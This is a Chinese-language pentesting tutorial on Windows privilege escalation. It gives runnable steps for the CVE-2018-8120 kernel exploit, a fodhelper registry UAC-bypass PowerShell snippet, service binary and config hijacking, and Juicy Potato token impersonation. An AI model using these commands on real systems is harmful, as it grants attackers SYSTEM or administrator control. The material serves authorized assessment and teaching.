内网渗透之权限提升

在渗透测试或红队演练中，获得一个低权限的初始会话往往只是开始。提权（Privilege Escalation）是决定攻击深度与影响范围的关键环节。本文将聚焦 Windows 环境下的常见提权手段，涵盖系统溢出漏洞、UAC 绕过、服务滥用及 Potato 系列工具，结合具体利用代码与操作步骤，帮助你在授权评估中系统化地提升权限。

历史漏洞提权：CVE-2018-8120

漏洞描述

该漏洞存在于 Windows 内核模式驱动win32k.sys中，由于SetImeInfoEx函数未能正确处理空指针，导致本地攻击者可利用该漏洞在低权限下执行任意代码，从而提升至 SYSTEM 权限。该漏洞属于“危险”级别，利用稳定且影响广泛。

影响版本

• Windows 7 (32/64 bit)

• Windows Server 2008 R2 (64 bit)

• Windows Server 2008 (32/64 bit)

• Windows Server 2012 (部分补丁前版本)

利用代码

公开的利用工具主要包括CVE-2018-8120.exe（由unamer等安全研究员编译）及对应的源码（C++）。利用程序通常接收进程 ID 作为参数，注入 shellcode 或直接启动 system 进程。

漏洞利用

前提条件

• 已获得目标系统的低权限 shell（如 IIS、普通用户）。

• 系统未安装相应补丁（KB4131188 或后续更新）。

利用步骤

1. 上传利用程序
   将CVE-2018-8120.exe上传至目标可写目录，例如C:\ProgramData\或C:\Windows\Temp\。

2. 查看当前权限

   whoami 输出示例：nt authority\iusr（低权限）

3. 执行提权
   若直接提权至 SYSTEM：

   CVE-2018-8120.exe

   部分版本需要指定 PID（如explorer.exe的 PID）：

   CVE-2018-8120.exe 1234

4. 验证结果
   执行whoami，若返回nt authority\system则提权成功。

💡补充：该漏洞利用时可能触发系统蓝屏（BSOD），建议先在测试环境验证。此外，Windows 10 及更高版本不受此漏洞影响。

bypassUAC 提权

UAC（用户账户控制）是 Windows 的安全机制，即使管理员账户在登录后，默认也是以标准用户权限运行，执行敏感操作时需弹窗确认。绕过 UAC可以在不触发弹窗的情况下，静默提权至管理员权限。

常见绕过思路

• 白名单程序劫持：利用系统信任的可执行文件（如fodhelper.exe、sdclt.exe、computerdefaults.exe）加载恶意 DLL 或注册表修改，实现静默提权。

• COM 对象绕过：通过调用高权限 COM 接口执行命令，如CMSTPLUA接口。

• 远程注入：向高权限进程注入代码。

利用工具

1. UACME (Akagi)

一个著名的 UAC 绕过项目，集成了数十种绕过方法。

• 下载编译后的Akagi.exe（或UACME.exe）。

• 使用方法：

  Akagi.exe 61 C:\Users\Public\payload.exe

  其中61是绕过方法的编号，不同系统适用不同方法（可用Akagi.exe list查看）。

2. PowerShell 利用

使用fodhelper.exe绕过 UAC（适用于 Windows 10）：

# 创建注册表项指向 payload New-Item -Path "HKCU:\Software\Classes\ms-settings\shell\open\command" -Force New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\shell\open\command" -Name "(default)" -Value "C:\Windows\System32\cmd.exe /c C:\Users\Public\payload.exe" -Force # 触发 fodhelper Start-Process "C:\Windows\System32\fodhelper.exe"

执行与验证

绕过 UAC 后，payload.exe将以管理员权限运行，可进一步创建管理员用户或执行提权操作。执行后可用whoami /groups检查是否包含Mandatory Label\High Mandatory Level标记。

Windows Service 提权

Windows 服务默认以 SYSTEM、LocalService 或 NetworkService 权限运行。若低权限用户对某个服务的二进制文件或服务配置具有写入权限，即可劫持服务，实现提权。

利用场景

1. 服务二进制可写

• 使用sc qc查看服务配置：

  sc qc VulnerableService

  关注BINARY_PATH_NAME路径。

• 检查当前用户对该文件是否有写入权限：

  icacls C:\Program Files\VulnService\service.exe

• 若当前用户具有修改权限，可替换服务程序：

  copy payload.exe C:\Program Files\VulnService\service.exe /Y

• 重启服务（若当前用户有启动/停止权限）：

  net stop VulnerableService net start VulnerableService

2. 服务配置权限不当

使用accesschk.exe（Sysinternals 工具）检查服务权限：

accesschk.exe -uwcqv "BUILTIN\Users" *

若结果显示当前用户对某个服务有SERVICE_ALL_ACCESS或SERVICE_CHANGE_CONFIG权限，则可修改服务配置：

sc config VulnerableService binPath= "C:\Users\Public\payload.exe" obj= "LocalSystem" sc start VulnerableService

实战工具

• PowerUp：PowerShell 脚本，自动检测服务提权可能，如Invoke-AllChecks。

• WinPEAS：多合一信息收集工具，能枚举出可写服务。

利用相关服务提权（烂土豆系列）

“烂土豆”（Potato）系列是一类利用 Windows 令牌伪造的提权技术，主要针对服务账户（如 IIS、MSSQL 等）提权至 SYSTEM。其核心原理是诱使 SYSTEM 权限的进程（如 DCOM 激活）与攻击者控制的服务建立 NTLM 认证，从而捕获令牌并模拟该令牌。

经典家族

• Hot Potato：最早的变种，结合 NBNS 欺骗、WPAD 代理劫持及 NTLM 中继。

• Juicy Potato：最常用的版本，通过 CLSID 触发 SYSTEM 服务连接，支持多种 Windows 版本。

• Rogue Potato：绕过端口监听限制的改进版。

• Sweet Potato：集多种技术于一体的工具。

Juicy Potato 利用流程

1. 上传 JuicyPotato.exe 和 payload（如 nc.exe 或 Beacon 载荷）
   例如：

   JuicyPotato.exe -l 1337 -p C:\Users\Public\payload.exe -t * -c {CLSID} -l：本地监听端口。 -p：要执行的程序（将提升至 SYSTEM）。 -t *：创建进程时使用 CreateProcessWithToken。 -c：指定 CLSID，需与目标系统匹配。

2. 获取 CLSID
   不同 Windows 版本的 CLSID 列表可参考项目 Wiki。常见通用值：

   {4991d34b-80a1-4291-83b6-3328366b9097} # Windows 10/Server 2016+

3. 执行并验证
   运行后，若输出CreateProcessWithToken OK，则 payload 已以 SYSTEM 权限执行。

适用场景

• 当前用户为SeImpersonatePrivilege或SeAssignPrimaryTokenPrivilege权限的用户（如IIS APPPOOL\DefaultAppPool、NT SERVICE\TrustedInstaller）。

• 使用whoami /priv查看当前权限，若存在上述特权即可尝试。